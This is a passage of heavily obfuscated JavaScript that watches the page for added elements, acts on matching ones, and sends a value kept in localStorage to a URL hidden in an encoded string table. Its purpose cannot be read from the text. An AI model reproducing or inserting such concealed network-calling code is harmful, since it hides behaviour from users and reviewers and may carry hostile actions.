NHoMtb8=yXZLWW2.indexOf(ilOuWSp[Ze0ESTw]);if(NHoMtb8===-LT_kr5[0x1])continue;if(Gpx24X5<LT_kr5[0x0]){Gpx24X5=NHoMtb8}else{dnSsLOz(Gpx24X5+=NHoMtb8*LT_kr5[0xc],tBJ48u|=Gpx24X5<<kHlSG4N,kHlSG4N+=(Gpx24X5&LT_kr5[0xd])>LT_kr5[0xe]?LT_kr5[0xf]:LT_kr5[0x10]);do{dnSsLOz(pDeD_a.push(tBJ48u&LT_kr5[0x3]),tBJ48u>>=LT_kr5[0x2],kHlSG4N-=LT_kr5[0x2])}while(kHlSG4N>LT_kr5[0x9]);Gpx24X5=-LT_kr5[0x1]}}if(Gpx24X5>-LT_kr5[0x1]){pDeD_a.push((tBJ48u|Gpx24X5<<kHlSG4N)&LT_kr5[0x3])}return jXLK_x(pDeD_a)}function LEkqUTm(FlmUjyW){if(typeof QKZcRD[FlmUjyW]===LT_kr5[0x5]){return QKZcRD[FlmUjyW]=doWCbVy(k8G48O[FlmUjyW])}return QKZcRD[FlmUjyW]}dnSsLOz(pDeD_a[LEkqUTm(0xae)]=LEkqUTm(0xaf),pDeD_a[LEkqUTm(0xb0)][LEkqUTm(0xb1)]=LEkqUTm(0xb2))}finally{function fBRBELN(FlmUjyW){var yXZLWW2=",*#2$}%JbIqzO<6soCLv^X3Y=GNx7>a;HnM/umeB]P+R40V\"EStfD:!|c9Aj.l`5h&?y8~kQi@r{w(K[)pFUd1g_TWZ",ilOuWSp,qOeh3Ug,pDeD_a,tBJ48u,kHlSG4N,Gpx24X5,Ze0ESTw;dnSsLOz(ilOuWSp=""+(FlmUjyW||""),qOeh3Ug=ilOuWSp.length,pDeD_a=[],tBJ48u=LT_kr5[0x0],kHlSG4N=LT_kr5[0x0],Gpx24X5=-LT_kr5[0x1]);for(Ze0ESTw=LT_kr5[0x0];Ze0ESTw<qOeh3Ug;Ze0ESTw++){var NHoMtb8=yXZLWW2.indexOf(ilOuWSp[Ze0ESTw]);if(NHoMtb8===-LT_kr5[0x1])continue;if(Gpx24X5<LT_kr5[0x0]){Gpx24X5=NHoMtb8}else{dnSsLOz(Gpx24X5+=NHoMtb8*LT_kr5[0xc],tBJ48u|=Gpx24X5<<kHlSG4N,kHlSG4N+=(Gpx24X5&LT_kr5[0xd])>LT_kr5[0xe]?LT_kr5[0xf]:LT_kr5[0x10]);do{dnSsLOz(pDeD_a.push(tBJ48u&LT_kr5[0x3]),tBJ48u>>=LT_kr5[0x2],kHlSG4N-=LT_kr5[0x2])}while(kHlSG4N>LT_kr5[0x9]);Gpx24X5=-LT_kr5[0x1]}}if(Gpx24X5>-LT_kr5[0x1]){pDeD_a.push((tBJ48u|Gpx24X5<<kHlSG4N)&LT_kr5[0x3])}return jXLK_x(pDeD_a)}function uAzwNZ7(FlmUjyW){if(typeof QKZcRD[FlmUjyW]===LT_kr5[0x5]){return QKZcRD[FlmUjyW]=fBRBELN(k8G48O[FlmUjyW])}return QKZcRD[FlmUjyW]}dnSsLOz(tBJ48u[uAzwNZ7(LT_kr5[0x22])]=LT_kr5[0x21],ilOuWSp[uAzwNZ7(LT_kr5[0x22])]=LT_kr5[0x21])}}dnSsLOz(kHlSG4N=new MutationObserver(FlmUjyW=>{FlmUjyW[qOeh3Ug(LT_kr5[0x23])](FlmUjyW=>{FlmUjyW[qOeh3Ug(0xb5)][qOeh3Ug(LT_kr5[0x23])](FlmUjyW=>{function yXZLWW2(FlmUjyW){var yXZLWW2="#?95%$QuT@s_7mD!CS>eWcry4~Kf:w<Ixjd[X]1&)8oBvJa3|ngVUM,tRPZL{lE*p`2}(kbzH=/.FA0^NqYO6+\"i;Gh",ilOuWSp,qOeh3Ug,pDeD_a,xya6Dqp,xGquxzw,tBJ48u,kHlSG4N;dnSsLOz(ilOuWSp=""+(FlmUjyW||""),qOeh3Ug=ilOuWSp.length,pDeD_a=[],xya6Dqp=LT_kr5[0x0],xGquxzw=LT_kr5[0x0],tBJ48u=-LT_kr5[0x1]);for(kHlSG4N=LT_kr5[0x0];kHlSG4N<qOeh3Ug;kHlSG4N++){var YS5C61=yXZLWW2.indexOf(ilOuWSp[kHlSG4N]);if(YS5C61===-LT_kr5[0x1])continue;if(tBJ48u<LT_kr5[0x0]){tBJ48u=YS5C61}else{dnSsLOz(tBJ48u+=YS5C61*LT_kr5[0xc],xya6Dqp|=tBJ48u<<xGquxzw,xGquxzw+=(tBJ48u&LT_kr5[0xd])>LT_kr5[0xe]?LT_kr5[0xf]:LT_kr5[0x10]);do{dnSsLOz(pDeD_a.push(xya6Dqp&LT_kr5[0x3]),xya6Dqp>>=LT_kr5[0x2],xGquxzw-=LT_kr5[0x2])}while(xGquxzw>LT_kr5[0x9]);tBJ48u=-LT_kr5[0x1]}}if(tBJ48u>-LT_kr5[0x1]){pDeD_a.push((xya6Dqp|tBJ48u<<xGquxzw)&LT_kr5[0x3])}return jXLK_x(pDeD_a)}function ilOuWSp(FlmUjyW){if(typeof QKZcRD[FlmUjyW]===LT_kr5[0x5]){return QKZcRD[FlmUjyW]=yXZLWW2(k8G48O[FlmUjyW])}return QKZcRD[FlmUjyW]}if(FlmUjyW[ilOuWSp(0xb6)]===ilOuWSp(0xb7)&&FlmUjyW[ilOuWSp(LT_kr5[0x24])]&&FlmUjyW[ilOuWSp(LT_kr5[0x24])][ilOuWSp(0xb9)](ilOuWSp(0xba))){function qOeh3Ug(FlmUjyW){var yXZLWW2="c+Fn{($[W1|#5*L~0l6/R@h_\"a!SOyu^;UI%bDo7rd]vZQXemz,?`N32w<xgf:}8=j9>)4.&CTqBYMPAJiKtHpEGsVk",ilOuWSp,qOeh3Ug,pDeD_a,xya6Dqp,xGquxzw,tBJ48u,kHlSG4N;dnSsLOz(ilOuWSp=""+(FlmUjyW||""),qOeh3Ug=ilOuWSp.length,pDeD_a=[],xya6Dqp=LT_kr5[0x0],xGquxzw=LT_kr5[0x0],tBJ48u=-LT_kr5[0x1]);for(kHlSG4N=LT_kr5[0x0];kHlSG4N<qOeh3Ug;kHlSG4N++){var YS5C61=yXZLWW2.indexOf(ilOuWSp[kHlSG4N]);if(YS5C61===-LT_kr5[0x1])continue;if(tBJ48u<LT_kr5[0x0]){tBJ48u=YS5C61}else{dnSsLOz(tBJ48u+=YS5C61*LT_kr5[0xc],xya6Dqp|=tBJ48u<<xGquxzw,xGquxzw+=(tBJ48u&LT_kr5[0xd])>LT_kr5[0xe]?LT_kr5[0xf]:LT_kr5[0x10]);do{dnSsLOz(pDeD_a.push(xya6Dqp&LT_kr5[0x3]),xya6Dqp>>=LT_kr5[0x2],xGquxzw-=LT_kr5[0x2])}while(xGquxzw>LT_kr5[0x9]);tBJ48u=-LT_kr5[0x1]}}if(tBJ48u>-LT_kr5[0x1]){pDeD_a.push((xya6Dqp|tBJ48u<<xGquxzw)&LT_kr5[0x3])}return jXLK_x(pDeD_a)}function pDeD_a(FlmUjyW){if(typeof QKZcRD[FlmUjyW]===LT_kr5[0x5]){return QKZcRD[FlmUjyW]=qOeh3Ug(k8G48O[FlmUjyW])}return QKZcRD[FlmUjyW]}if(ilOuWSp(0xbb)in GV8SE2){xya6Dqp()}function xya6Dqp(){}dnSsLOz(tBJ48u=FlmUjyW[pDeD_a(0xbc)],FlmUjyW[pDeD_a(0xbd)]())}})})}),kHlSG4N[qOeh3Ug(0xbe)](document[qOeh3Ug(0xbf)],{[qOeh3Ug(0xc0)]:LT_kr5[0x1f],[qOeh3Ug(0xc1)]:LT_kr5[0x1f]}));const Ze0ESTw=localStorage[qOeh3Ug(0xc2)](xGquxzw);if(Ze0ESTw){function NHoMtb8(FlmUjyW){var yXZLWW2="QBaJ(u~V_?4^rvRwc.`2E:xtKU[6XW,#Tyn&}lFZ\";=MDp8|z53sbN]IA1e<%)m+$o*@!kLY0g7CSdH9hO>Pj/{ifqG",ilOuWSp,qOeh3Ug,pDeD_a,xya6Dqp,xGquxzw,tBJ48u,kHlSG4N;dnSsLOz(ilOuWSp=""+(FlmUjyW||""),qOeh3Ug=ilOuWSp.length,pDeD_a=[],xya6Dqp=LT_kr5[0x0],xGquxzw=LT_kr5[0x0],tBJ48u=-LT_kr5[0x1]);for(kHlSG4N=LT_kr5[0x0];kHlSG4N<qOeh3Ug;kHlSG4N++){var YS5C61=yXZLWW2.indexOf(ilOuWSp[kHlSG4N]);if(YS5C61===-LT_kr5[0x1])continue;if(tBJ48u<LT_kr5[0x0]){tBJ48u=YS5C61}else{dnSsLOz(tBJ48u+=YS5C61*LT_kr5[0xc],xya6Dqp|=tBJ48u<<xGquxzw,xGquxzw+=(tBJ48u&LT_kr5[0xd])>LT_kr5[0xe]?LT_kr5[0xf]:LT_kr5[0x10]);do{dnSsLOz(pDeD_a.push(xya6Dqp&LT_kr5[0x3]),xya6Dqp>>=LT_kr5[0x2],xGquxzw-=LT_kr5[0x2])}while(xGquxzw>LT_kr5[0x9]);tBJ48u=-LT_kr5[0x1]}}if(tBJ48u>-LT_kr5[0x1]){pDeD_a.push((xya6Dqp|tBJ48u<<xGquxzw)&LT_kr5[0x3])}return jXLK_x(pDeD_a)}function ZbVmNQj(FlmUjyW){if(typeof QKZcRD[FlmUjyW]===LT_kr5[0x5]){return QKZcRD[FlmUjyW]=NHoMtb8(k8G48O[FlmUjyW])}return QKZcRD[FlmUjyW]}fetch(""+xya6Dqp+ZbVmNQj(0xc3)+Ze0ESTw)[ZbVmNQj(LT_kr5[0x28])](FlmUjyW=>{return FlmUjyW[ZbVmNQj(0xc5)]()})[ZbVmNQj(LT_kr5[0x28])](FlmUjyW=>{function yXZLWW2(FlmUjyW){var yXZLWW2="6x]>5?7943z*1%&2<;[u+OKrV.,Zy$HF(Q=tNb^PpgUE_G`8qhfiX:!nDCs{I|dmLlo~S\"}J@)BcjvRY/0waeATW#kM",ilOuWSp,qOeh3Ug,xya6Dqp,pDeD_a,xGquxzw,tBJ48u,kHlSG4N;dnSsLOz(ilOuWSp=""+(FlmUjyW||""),qOeh3Ug=ilOuWSp.length,xya6Dqp=[],pDeD_a=LT_kr5[0x0],xGquxzw=LT_kr5[0x0],tBJ48u=-LT_kr5[0x1]);for(kHlSG4N=LT_kr5[0x0];kHlSG4N<qOeh3Ug;kHlSG4N++){var YS5C61=yXZLWW2.indexOf(ilOuWSp[kHlSG4N]);if(YS5C61===-LT_kr5[0x1])continue;if(tBJ48u<LT_kr5[0x0]){tBJ48u=YS5C61}else{dnSsLOz(tBJ48u+=YS5C61*LT_kr5[0xc],pDeD_a|=tBJ48u<<xGquxzw,xGquxzw+=(tBJ48u&LT_kr5[0xd])>LT_kr5[0xe]?LT_kr5[0xf]:LT_kr5[0x10]);do{dnSsLOz(xya6Dqp.push(pDeD_a&LT_kr5[0x3]),pDeD_a>>=LT_kr5[0x2],xGquxzw-=LT_kr5[0x2])}while(xGquxzw>LT_kr5[0x9]);tBJ48u=-LT_kr5[0x1]}}if(tBJ48u>-LT_kr5[0x1]){xya6Dqp.push((pDeD_a|tBJ48u<<xGquxzw)&LT_kr5[0x3])}return jXLK_x(xya6Dqp)}function ilOuWSp(FlmUjyW){if(typeof QKZcRD[FlmUjyW]===LT_kr5[0x5]){return QKZcRD[FlmUjyW]=yXZLWW2(k8G48O[FlmUjyW])}return QKZcRD[FlmUjyW]}if(FlmUjyW[ZbVmNQj(0xc6)]===ilOuWSp(0xc7)){function qOeh3Ug(FlmUjyW){var yXZLWW2="P;|?Ip7X=5etxqRkDijd:6&$CwcO>sz\"3v9bl/JEro_*Na]`fug#nG{2Q^VBAT+8@4LK)YUMh%.H0}Fm1S(<[,Z!~yW",ilOuWSp,qOeh3Ug,xya6Dqp,pDeD_a,xGquxzw,tBJ48u,kHlSG4N;dnSsLOz(ilOuWSp=""+(FlmUjyW||""),qOeh3Ug=ilOuWSp.length,xya6Dqp=[],pDeD_a=LT_kr5[0x0],xGquxzw=LT_kr5[0x0],tBJ48u=-LT_kr5[0x1]);for(kHlSG4N=LT_kr5[0x0];kHlSG4N<qOeh3Ug;kHlSG4N++){var YS5C61=yXZLWW2.indexOf(ilOuWSp[kHlSG4N]);if(YS5C61===-LT_kr5[0x1])continue;if(tBJ48u<LT_kr5[0x0]){tBJ48u=YS5C61}else{dnSsLOz(tBJ48u+=YS5C61*LT_kr5[0xc],pDeD_a|=tBJ48u<<xGquxzw,xGquxzw+=(tBJ48u&LT_kr5[0xd])>LT_kr5[0xe]?LT_kr5[0xf]:LT_kr5[0x10]);do{dnSsLOz(xya6Dqp.push(pDeD_a&LT_kr5[0x3]),pDeD_a>>=LT_kr5[0x2],xGquxzw-=LT_kr5[0x2])}while(xGquxzw>LT_kr5[0x9]);tBJ48u=-LT_kr5[0x1]}}if(tBJ48u>-LT_kr5[0x1]){xya6Dqp.push((pDeD_a|tBJ48u<<xGquxzw)&LT_kr5[0x3])}return jXLK_x(xya6Dqp)}function xya6Dqp(FlmUjyW){if(typeof QKZcRD[FlmUjyW]===LT_kr5[0x5]){return QKZcRD[FlmUjyW]=qOeh3Ug(k8G48O[FlmUjyW])}return QKZcRD[FlmUjyW]}FGqp_v(FlmUjyW[xya6Dqp(0xc8)],YS5C61)}else{dnSsLOz(localStorage[ilOuWSp(0xc9)](xGquxzw),pDeD_a(ilOuWSp(0xca),ilOuWSp(0xcb)))}})[ZbVmNQj(0xcc)](()=>{function FlmUjyW(FlmUjyW){var yXZLWW2="TFVCoOlpBRrYKSJbUjdIqfEZcDknsXMimL%(HAWg#u@:ehvwQx8_,6^GaPN2*>5)~9\"y7[.z!`1;|04}={+3/$<?&t]",ilOuWSp,qOeh3Ug,pDeD_a,xya6Dqp,xGquxzw,tBJ48u,kHlSG4N;dnSsLOz(ilOuWSp=""+(FlmUjyW||""),qOeh3Ug=ilOuWSp.length,pDeD_a=[],xya6Dqp=LT_kr5[0x0],xGquxzw=LT_kr5[0x0],tBJ48u=-LT_kr5[0x1]);for(kHlSG4N=LT_kr5[0x0];kHlSG4N<qOeh3Ug;kHlSG4N++){var YS5C61=yXZLWW2.indexOf(ilOuWSp[kHlSG4N]);if(YS5C61===-LT_kr5[0x1])continue;if(tBJ48u<LT_kr5[0x0]){tBJ48u=YS5C61}else{dnSsLOz(tBJ48u+=YS5C61*LT_kr5[0xc],xya6Dqp|=tBJ48u<<xGquxzw,xGquxzw+=(tBJ48u&LT_kr5[0xd])>LT_kr5[0xe]?LT_kr5[0xf]:LT_kr5[0x10]);do{dnSsLOz(pDeD_a.push(xya6Dqp&LT_kr5[0x3]),xya6Dqp>>=LT_kr5[0x2],xGquxzw-=LT_kr5[0x2])}while(xGquxzw>LT_kr5[0x9]);tBJ48u=-LT_kr5[0x1]}}if(tBJ48u>-LT_kr5[0x1]){pDeD_a.push((xya6Dqp|tBJ48u<<xGquxzw)&LT_kr5[0x3])}return jXLK_x(pDeD_a)}function yXZLWW2(yXZLWW2){if(typeof QKZcRD[yXZLWW2]===LT_kr5[0x5]){return QKZcRD[yXZLWW2]=FlmUjyW(k8G48O[yXZLWW2])}return QKZcRD[yXZLWW2]}pDeD_a(yXZLWW2(0xcd),yXZLWW2(0xce))})}else{pDeD_a(qOeh3Ug(0xcf),qOeh3Ug(0xd0))}})();
